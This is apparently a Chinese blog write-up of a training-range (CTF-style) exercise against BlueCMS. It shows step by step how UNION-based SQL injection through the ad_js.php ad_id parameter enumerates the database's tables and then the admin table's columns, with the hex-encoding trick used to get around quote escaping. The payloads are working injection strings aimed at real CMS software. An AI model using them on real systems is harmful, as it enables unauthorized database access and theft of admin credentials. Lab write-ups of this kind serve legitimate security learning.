封神臺靶場:萌新也能找CMS突破
阿新 • • 發佈:2020-11-18
靶場地址
http://59.63.200.79:8003/bluecms/uploads/
百度查詢了bluecms的相關漏洞
發現存在sql注入,且sql注入點在如下網頁
http://59.63.200.79:8003/bluecms/uploads/ad_js.php?ad_id=1
經過探測,發現欄位數是7個
http://59.63.200.79:8003/bluecms/uploads/ad_js.php?ad_id=1%20union%20select%201,2,3,4,5,6,database()
發現是可以爆出資料庫相關資訊的
爆表名
?ad_id=1%20union select 1,2,3,4,5,6,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+
document.write("blue_ad,blue_ad_phone,blue_admin,blue_admin_log,blue_ann,blue_ann_cat,blue_arc_cat,blue_area,blue_article,blue_attachment,blue_buy_record,blue_card_order,blue_card_type,blue_category,blue_comment,blue_config,blue_flash_image,blue_guest_book,blue_ipbanned,blue_link,blue_model,blue_navigate,blue_pay,blue_post,blue_post_att,blue_post_pic,blue_service,blue_task,blue_user");
根據上面爆出來的資料,我發現有兩個敏感的表名,blue_admin,blue_admin_log
爆欄位
但是我這裡遇到了問題
?ad_id=1%20union select 1,2,3,4,5,6,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='blue_admin')--+
初步判斷是因為轉義的原因,看到 \ 反斜槓,突然感覺有點像寬位元組注入。
但錯誤並沒有解決,我去掉單引號後,識別出來的是這樣的
table_name=遙lue_admin�
這導致sql語句不正常。
我想到用編碼的方式試一下。
?ad_id=1%20union select 1,2,3,4,5,6,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x626c75655f61646d696e)--+
document.write("admin_id,admin_name,email,pwd,purview,add_time,last_login_time,last_login_ip");
頁面無報錯,爆出欄位